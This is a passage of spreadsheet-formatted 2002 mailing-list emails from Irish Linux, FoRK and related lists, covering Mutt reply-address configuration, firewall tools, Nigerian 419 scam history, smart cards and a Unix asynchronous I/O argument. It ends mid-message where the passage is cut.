    <t>"Justin Mason" &lt;yyyy@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Re: [SAdev] Alternatives to the GA</t>
  </si>
  <si>
    <t>Justin Mason wrote: &gt; I'd be happy to do that -- providing the nonspam.log and spam.log files &gt; from my mass-check output (ie. the "matrix of test results" in Ken's &gt; terms).  Along with the default scores, this is the entire input data set &gt; for the SpamAssassin GA system. Always happy to contribute my mass-check logs.  The only problem is that was all have to be using the exact same ruleset. Let me know if you want them. rOD. -- "I would also have accepted 'Snacktacular'" &gt;&gt; Doing the blogging thang again at [URL]http://www.groovymother.com[/URL] &lt;&lt;</t>
  </si>
  <si>
    <t>To: "Patton, Tony" &lt;tony.patton@nwifhe.ac.uk&gt;\nFrom: =?iso-8859-1?Q?Colm_MacC=E1rthaigh?= &lt;colmmacc@redbrick.dcu.ie&gt;\nDate: Tue, 30 Jul 2002 13:25:36 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 13:25:36 +0100</t>
  </si>
  <si>
    <t>"Patton, Tony" &lt;tony.patton@nwifhe.ac.uk&gt;</t>
  </si>
  <si>
    <t>On Tue, Jul 30, 2002 at 01:17:25PM +0100, Patton, Tony wrote: &gt; On Tue, 2002-07-30 at 10:06, Donncha O Caoimh wrote: &gt; &gt; Ar mhaith le einne anseo caint le TG4 faoin LBW? &gt; &gt;  &gt; &gt; Donncha. &gt; &gt;  &gt;  &gt; ----8&lt; &gt;  &gt; &gt; T m ag danamh taighde don clr teilifse An Tuath Nua (a bhonn  &gt; &gt; chraoladh ar TG4) faoi lthair, agus chonaic m go mbedih an Linux Beer &gt; &gt; Hike ar sil i Doolin i mbliana. Bheadh spis againn mr a dhanamh mar &gt; &gt; gheall ar an Hike ar an gclr - an mbeidh t fin n aon duine eile le &gt; &gt; Gaeilge ar an Hike go bhfios duit? &gt; &gt;  &gt; &gt; Go raibh maith agat as do chabhair, &gt; &gt;  &gt;  &gt; ----&gt;8 &gt;  &gt; Can someone translate this for me? Lost all sense of Irish when moved &gt; over the border about 10 years ago. Not by choice mind you :-( "Currently, I am doing some research for the telivision programme  "An Tuath Nua"  (which is broadcast by TG4) , and I saw that the Linux Beer Hike will be in Doolin this year. We'd be intrested  in including a report on the hike in the programme - will yourself or anyone else with Irish be on the Hike do you know ? Thanks for your help." --  colmmacc@redbrick.dcu.ie        PubKey: colmmacc+pgp@redbrick.dcu.ie   Web:                                 [URL]http://devnull.redbrick.dcu.ie[/URL]  --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: harley@argote.ch (Robert Harley)\nDate: Tue, 30 Jul 2002 13:25:01 +0200 (CEST)</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 13:25:01 +0200 (CEST)</t>
  </si>
  <si>
    <t>Another one fizzles out...\n\n[URL]http://www.cnn.com[/URL]\n------------------------------------------------------------------------------\nAsteroid impact with Earth ruled out for 2019\n\nPASADENA, California (AP) -- Astronomers said Monday they have\ndetermined that a newly discovered, 1.2-mile-wide asteroid will miss\nthe Earth in 2019.\n\n[...]\n------------------------------------------------------------------------------\n\nR\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.cnn.com http://xent.com</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Philip Reynolds &lt;phil@redbrick.dcu.ie&gt;\nDate: Tue, 30 Jul 2002 13:22:38 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 13:22:38 +0100</t>
  </si>
  <si>
    <t>Philip Reynolds &lt;phil@redbrick.dcu.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] ipfw vs ipchains vs iptables</t>
  </si>
  <si>
    <t>Nick Hilliard's [nick-lists@netability.ie] 52 lines of wisdom included:\n&gt; The standard release versions of ipfilter are unencumbered, as always.\n&gt; \n&gt; &gt; Nope, indeed IPFW2 has just been rolled out into -STABLE. (-STABLE\n&gt; &gt; is a stable branch of the code that has been rolled into -CURRENT\n&gt; &gt; first. It's basically a major release, that's still a work in\n&gt; &gt; progress)\n&gt; \n&gt; I'm not so sure that ipfw2 is really ready for production yet, having\n&gt; only been mfc'd last wednesday.  It certainly adds some nice syntactic\n&gt; sugar, and is apparently much faster for certain types of complex\n&gt; rulesets.  It will be good once it's had some time to settle down a\n&gt; little.\n\nI would question anything being ready for "production" being in\nSTABLE.\n\nHe's kept backwards compatibility with ipfw, which is major plus.\n\nMy point about IPFW2 being rolled out into stable was merely an\nillustration of the fact that ipfw is indeed not ipfilter, and that\nthere are no license issues there :)\n\n-- \n  Philip Reynolds        \n   RFC Networks          tel: 01 8832063\n[URL]www.rfc-networks.ie[/URL]      fax: 01 8832041\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>www.rfc-networks.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Dave Long &lt;dl@silcom.com&gt;\nDate: Tue, 30 Jul 2002 12:00:34 -0700</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 12:00:34 -0700</t>
  </si>
  <si>
    <t>I am the new #2 [Re: USA USA ...]</t>
  </si>
  <si>
    <t>&gt; Yes, and the working class deserves what it gets, ... Careful now, you're talking about most (80%) of the country. (although perhaps it is true that in a democracy, the people wind up with the government which they deserve) &gt; ... I grew up in as abject a poverty as you can find in the US ... ... and there is a large excluded middle between those "in poverty" and those who are more affluent than "working class". I don't know what poverty officially is, but from a CA perspective, $15k income is not going to go far.  At current interest rates, one would probably want somewhere around $500k* wealth to throw that amount, which pretty much limits the non-working class to a small, single-digit percentage of households.  (how much overlap do we have with the retirement cohort here?) The 2000 numbers pretty much confirm it: shows that the top 5% of incomes are mostly two+-earner households, and the zero-earner  households are rare above median incomes. We are the workers' paradise. The census figured $18k as the cutoff for lowest 5th, so with that as a poverty line, the percentages break down as follows: work\pov.  yes  no yes        9    72 no        11     8 -Dave ::::::::::: * perhaps that's not even enough: "[Irvine] "Everyone has to take a job sometime" / NH3" (1998 wealth data was supposedly released in 2001, but I haven't seen it yet on the census site.  Anyone have a pointer?) ::::::::::: &gt; Do you punish the whole industry due to a few bad apples? &gt;&gt;From what little I have heard, the legislation simply says that lying in one's public figures is not just a matter of cheating the accounts, but really involves stealing time and money from one's employees and investors.  How does not tolerating the bad apples equate to punishing the good ones? [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Gavin McCullagh &lt;ilug_gmc@fiachra.ucd.ie&gt;\nDate: Tue, 30 Jul 2002 11:40:16 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 11:40:16 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] Mutt reply hooks</t>
  </si>
  <si>
    <t>Hi, On Tue, 30 Jul 2002, Gavin McCullagh wrote: &gt; set alternates = "kbeditor@linuxcare.com|coolapps@linuxcare.com" &gt; set reverse_name PS Make sure not to have a line like this: 	send-hook .  'my_hdr From: Gavin McCullagh " which will only override it and cause pain and suffering. Gavin --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: David Neary &lt;dneary@wanadoo.fr&gt;\nDate: Tue, 30 Jul 2002 11:28:11 +0200</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 11:28:11 +0200</t>
  </si>
  <si>
    <t>[ILUG] Mutt reply hooks</t>
  </si>
  <si>
    <t>Hi all,\n\nI have 3 or 4 email addresses (which get used for different\nreasons), and I'd prefer not to mix them up. So I was wondering\nif anyone knows of a way that I can have mail (apart from list\nmail, which I have already sorted) which arrives to a certain\ne-mail address have the From: header in the reply automatically\nset to the address it came to.\n\nFor example, say I have a company, and sales@company.com,\ninfo@company.com and tech@company.com arrive in the same mailbox.\nI don't want to reply to sales@company.com mails with the From:\nset to dave@company.com, I would like the mail to come from\nsales@company.com.\n\nIs there any way to do this? Bearing in mind that mail can arrive\nwith my email in the To or Cc fields (and Bcc?), and it might be\nburied in a couple of dozen other recipients...\n\nCheers,\nDave.\n\n-- \n       David Neary,\n    Marseille, France\n  E-Mail: bolsh@gimp.org\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: David Neary &lt;dneary@wanadoo.fr&gt;\nFrom: kevin lyda &lt;kevin+dated+1028542165.571dd7@linux.ie&gt;\nDate: Tue, 30 Jul 2002 11:09:23 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 11:09:23 +0100</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin+dated+1028542165.571dd7@linux.ie&gt;</t>
  </si>
  <si>
    <t>On Tue, Jul 30, 2002 at 11:28:11AM +0200, David Neary wrote: &gt; For example, say I have a company, and sales@company.com, &gt; info@company.com and tech@company.com arrive in the same mailbox. &gt; I don't want to reply to sales@company.com mails with the From: &gt; set to dave@company.com, I would like the mail to come from &gt; sales@company.com. &gt;  &gt; Is there any way to do this? Bearing in mind that mail can arrive &gt; with my email in the To or Cc fields (and Bcc?), and it might be &gt; buried in a couple of dozen other recipients... i sort my mail into folders using procmail.  so typically i'm in the ilug folder for ilug mail, the doolin folder for doolin mail, etc. so i use folder-hooks to accomplish that.  as an example (i do line wrapping to keep it less then 80 chars long - spacing is important): folder-hook . "my_hdr From: kevin lyda ;"\ "my_hdr X-GPG-Fingerprint: 9C1D 16F4 11F1 6BD2 933C  048D ACC7 9840 89D0 7646;"\ "set pgp_sign_as=0x89D07646;set signature=~/.signature;"\ "set folder=~/Mail;set record=~/Mail/outbox;set postponed=~/Mail/postponed" folder-hook /(alphyra|Alphyra/[^.].*) \ "my_hdr From: kevin lyda ;my_hdr X-GPG-Fingerprint: "\ "088E 2BC4 381E 990A 1E0E  1DA0 4D44 99EF 20E6 38A0;"\ "set pgp_sign_as=0x20E638A0;set signature=~/.signature.d/itg.sig;"\ "set folder=~/Mail/Alphyra;set record=~/Mail/Alphyra/outbox;"\ "set postponed=~/Mail/Alphyra/postponed" you could also do this with send hooks.  i use them to tweak gpg settings: send-hook .			"unset pgp_autoencrypt;set pgp_autosign" send-hook (ilug|webdev|social)@linux.ie	\ 				"unset pgp_autosign;unset pgp_autoencrypt" and then i have an include file with all people who have keys. kevin --  kevin@suberic.net     that a believer is happier than a skeptic is no more to fork()'ed on 37058400    the point than the fact that a drunken man is happier meatspace place: home       than a sober one. the happiness of credulity is a [URL]http://ie.suberic.net[/URL]   cheap &amp; dangerous quality -- g.b. shaw --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'dneary@wanadoo.fr'" &lt;dneary@wanadoo.fr&gt;\nFrom: Gavin Costello &lt;GCostello@altamedius.com&gt;\nDate: Tue, 30 Jul 2002 11:01:50 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 11:01:50 +0100</t>
  </si>
  <si>
    <t>Gavin Costello &lt;GCostello@altamedius.com&gt;</t>
  </si>
  <si>
    <t>"'dneary@wanadoo.fr'" &lt;dneary@wanadoo.fr&gt;</t>
  </si>
  <si>
    <t>[ILUG] mutt replies</t>
  </si>
  <si>
    <t>Hi David,\n\nTry putting "set reverse_name" in your .muttrc.\n\nRegards,\n\nGavin.\n\n\n**********************************************************************\nThis email and any files transmitted with it are confidential and\nintended solely for the use of the individual or entity to whom they\nare addressed. If you have received this email in error please notify\nthe system manager.\n\nThis footnote also confirms that this email message has been swept by\nMIMEsweeper for the presence of computer viruses.\n\n[URL]www.mimesweeper.com[/URL]\n**********************************************************************\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>www.mimesweeper.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Tue, 30 Jul 2002 11:00:45 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 11:00:45 +0100</t>
  </si>
  <si>
    <t>On Tue, Jul 30, 2002 at 11:28:11AM +0200, David Neary mentioned:\n&gt; For example, say I have a company, and sales@company.com,\n&gt; info@company.com and tech@company.com arrive in the same mailbox.\n&gt; I don't want to reply to sales@company.com mails with the From:\n&gt; set to dave@company.com, I would like the mail to come from\n&gt; sales@company.com.\n\n Best thing to do would be to have each of those addresses going to a\ndifferent folder, then set your "from" address based on the folder you are\nin, when replying.\n\njohn\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Gavin McCullagh &lt;ilug_gmc@fiachra.ucd.ie&gt;\nDate: Tue, 30 Jul 2002 11:00:32 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 11:00:32 +0100</t>
  </si>
  <si>
    <t>Hi,\n\nhavn't tried this, but looks like what you want.  I use procmail to filter\ndifferent incomgin To/CCs to different folders then use folder hok, but\nthis looks closer to what you want.\n\n\n[URL]http://www.linuxcare.com[/URL]\n\n**************************************************************************\nSome of the mailto links on our web site forward to me. When I reply to\nsomeone who writes to one of these aliases, I prefer to keep the mail alias\nas the From: address in my reply. For example, when someone sends email to\ncoolapps@linuxcare.com to suggest a program for me to review [pardon the\nblatant plug...], it forwards to me. When I hit reply, the From: line in\nthe email will contain coolapps@linuxcare.com instead of my main address\nbneely@linuxcare.com. My .muttrc file accomplishes this with two lines:\n\nset alternates = "kbeditor@linuxcare.com|coolapps@linuxcare.com"\nset reverse_name\n\n**************************************************************************\n\nOn Tue, 30 Jul 2002, David Neary wrote:\n\n&gt; I have 3 or 4 email addresses (which get used for different\n&gt; reasons), and I'd prefer not to mix them up. So I was wondering\n&gt; if anyone knows of a way that I can have mail (apart from list\n&gt; mail, which I have already sorted) which arrives to a certain\n&gt; e-mail address have the From: header in the reply automatically\n&gt; set to the address it came to.\n&gt; \n&gt; For example, say I have a company, and sales@company.com,\n&gt; info@company.com and tech@company.com arrive in the same mailbox.\n&gt; I don't want to reply to sales@company.com mails with the From:\n&gt; set to dave@company.com, I would like the mail to come from\n&gt; sales@company.com.\n&gt; \n&gt; Is there any way to do this? Bearing in mind that mail can arrive\n&gt; with my email in the To or Cc fields (and Bcc?), and it might be\n&gt; buried in a couple of dozen other recipients...\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.linuxcare.com http://www.linux.ie</t>
  </si>
  <si>
    <t>PHL</t>
  </si>
  <si>
    <t>To: David Neary &lt;dneary@wanadoo.fr&gt;, ilug@linux.ie\nFrom: Colm Buckley &lt;colm@tuatha.org&gt;\nDate: Tue, 30 Jul 2002 10:52:07 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 10:52:07 +0100</t>
  </si>
  <si>
    <t>Colm Buckley &lt;colm@tuatha.org&gt;</t>
  </si>
  <si>
    <t>David Neary &lt;dneary@wanadoo.fr&gt;, ilug@linux.ie</t>
  </si>
  <si>
    <t>On Tue 30 Jul 2002 10:28, David Neary wrote:\n\n&gt; I have 3 or 4 email addresses (which get used for different\n&gt; reasons), and I'd prefer not to mix them up. So I was wondering\n&gt; if anyone knows of a way that I can have mail (apart from list\n&gt; mail, which I have already sorted) which arrives to a certain\n&gt; e-mail address have the From: header in the reply automatically\n&gt; set to the address it came to.\n\nI don't know Mutt, to be honest, but the KDE mail client "KMail" can\ndo this very neatly - you set up multiple "Identity" profiles, each\nwith a distinct email address (and other things if desired, like a GPG\nkey and a signature).  You can then set up KMail to use various\nidentities automatically when replying to messages which match a\nparticular pattern, or which are in a particular folder, etc.  It's\nall very cool, and it works very nicely.\n\nBut I still don't know how to do it in Mutt.\n\n             Colm\n\n-- \nColm Buckley | colm@tuatha.org | +353 87 2469146 | [URL]www.colm.buckley.name[/URL]\nA dirty mind is a terrible thing to waste.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>www.colm.buckley.name http://www.linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: "Kevin Worthington" &lt;kworthington@linuxmail.org&gt;\nDate: Tue, 30 Jul 2002 10:50:17 -0500</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 10:50:17 -0500</t>
  </si>
  <si>
    <t>"Kevin Worthington" &lt;kworthington@linuxmail.org&gt;</t>
  </si>
  <si>
    <t>&gt; Hehe :-) So your usual *n?x login is "dude" too? ;-))))))) &gt;  &gt; Matthias Hey Matthias, Actually it isn't, I used yours (I remembered from the RPM builder's guide "The fight" that your wrote). Mine is boring, I use kworthington, since my boxes are on a corporate LAN. Sorry to get your hopes up! You can think of it as a tribute to you if it makes you feel any better :-) ------------------------------------------------ Kevin Worthington -  Faithful Red Hat Linux user since April 1998 Registered Linux User #218689 - [URL]http://counter.li.org[/URL] --  Get your free email from [URL]www.linuxmail.org[/URL]  Powered by Outblaze _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://counter.li.org www.linuxmail.org http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: "Kevin Worthington" &lt;kworthington@linuxmail.org&gt;\nDate: Tue, 30 Jul 2002 10:43:11 -0500</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 10:43:11 -0500</t>
  </si>
  <si>
    <t>Hi Harri Thanks for the help! &gt; &gt; (why do I have the feeling that Matthias will answer this one...? ;-) &gt;  &gt; I'm sorry if I disappointed you :) Hehe, no not at all! ;) ------------------------------------------------ Kevin Worthington -  Faithful Red Hat Linux user since April 1998 Registered Linux User #218689 - [URL]http://counter.li.org[/URL] --  Get your free email from [URL]www.linuxmail.org[/URL]  Powered by Outblaze _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Donncha O Caoimh &lt;donncha.ocaoimh@tradesignals.com&gt;\nDate: Tue, 30 Jul 2002 10:06:36 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 10:06:36 +0100</t>
  </si>
  <si>
    <t>[ILUG] Fwd: Linux Beer Hike</t>
  </si>
  <si>
    <t>Ar mhaith le einne anseo caint le TG4 faoin LBW? Donncha. ----------  Forwarded Message  ---------- Subject: Linux Beer Hike Date: Tue, 30 Jul 2002 10:00:56 +0100 From: Diarmaid Mac Mathuna  To: donncha.ocaoimh@tradesignals.com A Dhonncha, a chara, T m ag danamh taighde don clr teilifse An Tuath Nua (a bhonn  chraoladh ar TG4) faoi lthair, agus chonaic m go mbedih an Linux Beer Hike ar sil i Doolin i mbliana. Bheadh spis againn mr a dhanamh mar gheall ar an Hike ar an gclr - an mbeidh t fin n aon duine eile le Gaeilge ar an Hike go bhfios duit? Go raibh maith agat as do chabhair, Sln, Diarmaid _________________________ Diarmaid Mac Mathna Agtel 37-39 Fitzwilliam Square, Dublin 2 37-39 Pls Mhic Liam, Baile tha Cliath 2 Phone / Fn: (01) 605 3737 / (086) 880 4187 Fax / Facs:  (01) 676 6137 e-mail / r-phost: diarmaid.mac@agtel.ie web / idirlon:   [URL]www.agtel.ie[/URL] ------------------------------------------------------- --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>www.agtel.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Paul Kelly &lt;longword@esatclear.ie&gt;\nDate: Tue, 30 Jul 2002 05:22:28 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 05:22:28 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] Optimizing for Pentium Pt.2</t>
  </si>
  <si>
    <t>Liam Bedford wrote:\n&gt; that is the CVS version, but it seems that more breakage is to come with the\n&gt; kernel :(\n\nLimbo seems to be able to compile its own kernel with its own gcc 3.1. \nThat said, I don't want to know what kind of patches Redhat are applying \nto that kernel. The .spec file alone is 128KBytes! One of the patches is \n2.4.19-ac10. Redhat don't seem to have patched Limbo's gcc too heavily.\n\nPaul.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: bitbitch@magnesium.net, fork@spamassassin.taint.org\nFrom: Mike Masnick &lt;mike@techdirt.com&gt;\nDate: Tue, 30 Jul 2002 00:23:07 -0700</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 00:23:07 -0700</t>
  </si>
  <si>
    <t>bitbitch@magnesium.net, fork@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Re: One scam to rule them all..</t>
  </si>
  <si>
    <t>At 12:05 AM 7/30/02 -0700, bitbitch@magnesium.net wrote:\n&gt;common.   The origination, at least to NPR's knowledge, starts with the \n&gt;scam elements being transposed from Nigeria,\n&gt;to London, England.   Instead of the bereved widow of a Nigerian national, \n&gt;the originating con was directed to the 'heirs'\n&gt;of Sir Frances Drake's estate.   If you were 'chosen' as an heir, you \n&gt;could contribute a portion of your money so that a\n&gt;fellow heir (and scam artist) could reclaim the monetary largess in the \n&gt;Court of England, by proving that Elizabeth I had\n&gt;nulled Sir Drake's will and taken his fortune as her own.   Oscar\n&gt;Hartzell, the gent who started this scam, way back in the early 1800s,\n&gt;managed to gain quite a fortune, all on the backs of idiots.   Sound familiar?\n\nCoincidentally enough, I'm currently in the middle of a pretty good book \nabout the Francis Drake scam called "Drake's Fortune" by Richard Raynor.\n\nDespite being pretty familiar with the whole 419 scam stuff (see my earlier \nFoRK post from a few months back about how the whole scam works: \n[URL]http://www.xent.com[/URL] I never put the \ntwo together as being related.\n\nApparently, I suck at pattern matching.\n\n-Mike\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.xent.com http://xent.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: bitbitch@magnesium.net\nDate: Tue, 30 Jul 2002 00:05:28 -0700</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 00:05:28 -0700</t>
  </si>
  <si>
    <t>bitbitch@magnesium.net</t>
  </si>
  <si>
    <t>One scam to rule them all..</t>
  </si>
  <si>
    <t>One scam to rule them all,\nOne scam to bind them, \nOne scan to burn them all, \nAnd the stupidity bind them. \n\n(Yes, i'm ripping, and badly from LOTR) \n\nAlright, so NPR's All Things Considered had a wonderful story on the whole Nigerian 419 scams that seem to be running\ninto my inbox constantly (Thanks FoRK!) Turns out, these 419 scams (419 is the statute in Nigeria that this particular form\nof fraud falls under) have actually snared a few people -- NPR reported to the tune of 100 million dollars over a few years, in the US alone.\n\nOne website listed the 419 scam as being the 'third to fith largest industry in Nigeria' (1), netting billions of dollars\nfrom around the world.   Its large enough to warrant a governmental investigation and a special number to call and report\n(to the secret service, no less) scam abuse. (2)   Folks are apparently being held for ransom if they decide to go\n'check out' the scam.  (3).\n\nListen to the NPR article (4).   What's great about NPR is the commentary at the end. Turns out, this is all unbelievably\ncommon.   The origination, at least to NPR's knowledge, starts with the scam elements being transposed from Nigeria,\nto London, England.   Instead of the bereved widow of a Nigerian national, the originating con was directed to the 'heirs'\nof Sir Frances Drake's estate.   If you were 'chosen' as an heir, you could contribute a portion of your money so that a\nfellow heir (and scam artist) could reclaim the monetary largess in the Court of England, by proving that Elizabeth I had\nnulled Sir Drake's will and taken his fortune as her own.   Oscar\nHartzell, the gent who started this scam, way back in the early 1800s,\nmanaged to gain quite a fortune, all on the backs of idiots.   Sound familiar?\n\nA fool and his money, deserve to be parted. \n\n(1) [URL]http://home.rica.net[/URL]\n(2) 'If you have received a letter, but have not lost any monies to this scheme, please fax a copy of that letter to\n(202) 406-5031.'  From:  [URL]http://www.secretservice.gov[/URL]  --\nThey also have a number for those idiots who have lost their money to this.  \n(3) [URL]http://www.crimes-of-persuasion.com[/URL]\n(4) [URL]http://www.npr.org[/URL]  -- Go down to Nigerian 419 scams\n\n\nSo i'm in a wierd mood, go figure.\n\nBB\n-- \nBest regards,\n bitbitch                          mailto:bitbitch@magnesium.net\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://home.rica.net http://www.secretservice.gov http://www.crimes-of-persuasion.com http://www.npr.org http://xent.com</t>
  </si>
  <si>
    <t>To: secprog@securityfocus.com\nFrom: Yannick Gingras &lt;ygingras@ygingras.net&gt;\nDate: Tue, 3 Sep 2002 21:03:40 -0400</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 21:03:40 -0400</t>
  </si>
  <si>
    <t>&gt; &gt; Is the use of "trusted hardware" really worth it ?\n&gt;\n&gt; Answering that requires fairly complete knowledge of the business\n&gt; model. But, in all probability: no, it isn't usually worth it. So, it\n&gt; comes down to how difficult you want to make the cracker's job.\n&gt;\n&gt; &gt; Look at the DVDs.\n&gt;\n&gt; IIRC, CSS was cracked by reverse-engineering a software player; and\n&gt; one where the developers forgot to encrypt the decryption key at that.\n\nThis make me wonder about the relative protection of smart cards.  They have \nan internal procession unit around 4MHz.  Can we consider them as trusted \nhardware ?  The ability to ship smart cards periodicaly uppon cashing of a \nmonthly subscription fee would not raise too much the cost of "renting" the \nsystem.  Smart card do their own self encryption.  Can they be used to \ndecrypt data needed by the system ?  The input of the system could me mangled \nand the would keep a reference of how long it was in service.\n\nThis sounds really feasible but I may be totaly wrong.  I may also be wrong \nabout the safety of a smart card.  \n\nWhat do you think ?\n\n-- \nYannick Gingras\nCoder for OBB : Oceangoing Bared Bonanza\n[URL]http://OpenBeatBox.org[/URL]</t>
  </si>
  <si>
    <t>To: Kragen Sitaker &lt;kragen@pobox.com&gt;\nFrom: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nDate: Tue, 3 Sep 2002 19:24:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 19:24:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>Kragen Sitaker &lt;kragen@pobox.com&gt;</t>
  </si>
  <si>
    <t>Re: asynchronous I/O (was Re: Gasp!)</t>
  </si>
  <si>
    <t>On Tue, 3 Sep 2002, Kragen Sitaker wrote: &gt; Of course we've had select() since BSD 4.2 and poll() since System V &gt; or so, and they work reasonably well for asynchronous I/O up to a &gt; hundred or so channels, but suck after that; /dev/poll (available in &gt; Solaris and Linux) is one approach to solving this; Linux has a way to &gt; do essentially the same thing with real-time signals, and has for &gt; years; and FreeBSD has kqueue. &gt; &gt; More details about these are at &gt; [URL]http://www.citi.umich.edu[/URL] &gt; &gt; None of this helps with disk I/O; most programs that need to overlap &gt; disk I/O with computation, on either proprietary Unixes or Linux, just &gt; use multiple threads or processes to handle the disk I/O. &gt; &gt; POSIX specifies a mechanism for nonblocking disk I/O that most &gt; proprietary Unixes implement.  The Linux kernel hackers are currently &gt; rewriting Linux's entire I/O subsystem essentially from scratch to &gt; work asynchronously, because they can easily build efficient &gt; synchronous I/O primitives from asynchronous ones, but not the other &gt; way around. So now Linux will support this mechanism too. &gt; &gt; It probably doesn't need saying for anyone who's read Beberg saying &gt; things like "Memory management is a non-issue for anyone that has any &gt; idea at all how the hardware functions," but he's totally off-base. &gt; People should know by now not to take anything he says seriously, but &gt; apparently some don't, so I'll rebut. &gt; &gt; Not surprisingly, the rebuttal requires many more words than the &gt; original stupid errors. &gt; &gt; In detail, he wrote: &gt; &gt; Could it be? After 20 years without this feature UNIX finally &gt; &gt; catches up to Windows and has I/O that doesnt [sic] totally suck for &gt; &gt; nontrivial apps? No way! &gt; &gt; Unix acquired nonblocking I/O in the form of select() about 23 years &gt; ago, and Solaris has had the particular aio_* calls we are discussing &gt; for many years.  Very few applications need the aio_* calls --- &gt; essentially only high-performance RDBMS servers even benefit from them &gt; at all, and most of those have been faking it fine for a while with &gt; multiple threads or processes.  This just provides a modicum of extra &gt; performance. &gt; &gt; &gt; OK, so they do it with signals or a flag, which is completely &gt; &gt; ghetto, but at least they are trying. Keep trying guys, you got the &gt; &gt; idea, but not the clue. &gt; &gt; Readers can judge who lacks the clue here. &gt; &gt; &gt; The Windows I/O model does definately [sic] blow the doors off the &gt; &gt; UNIX one, but then they had select to point at in it's [sic] &gt; &gt; suckiness and anything would have been an improvement. UNIX is just &gt; &gt; now looking at it's [sic] I/O model and adapting to a multiprocess &gt; &gt; multithreaded world so it's gonna be years yet before a posix API &gt; &gt; comes out of it. &gt; &gt; Although I don't have a copy of the spec handy, I think the aio_* APIs &gt; come from the POSIX spec IEEE Std 1003.1-1990, section 6.7.9, which is &gt; 13 years old, and which I think documented then-current practice. &gt; They might be even older than that. &gt; &gt; Unix has been multiprocess since 1969, and most Unix implementations &gt; have supported multithreading for a decade or more. &gt; &gt; &gt; Bottom line is the "do stuff when something happens" model turned &gt; &gt; out to be right, and the UNIX "look for something to do and keep &gt; &gt; looking till you find it no matter how many times you have to look" &gt; &gt; is not really working so great anymore. &gt; &gt; Linux's 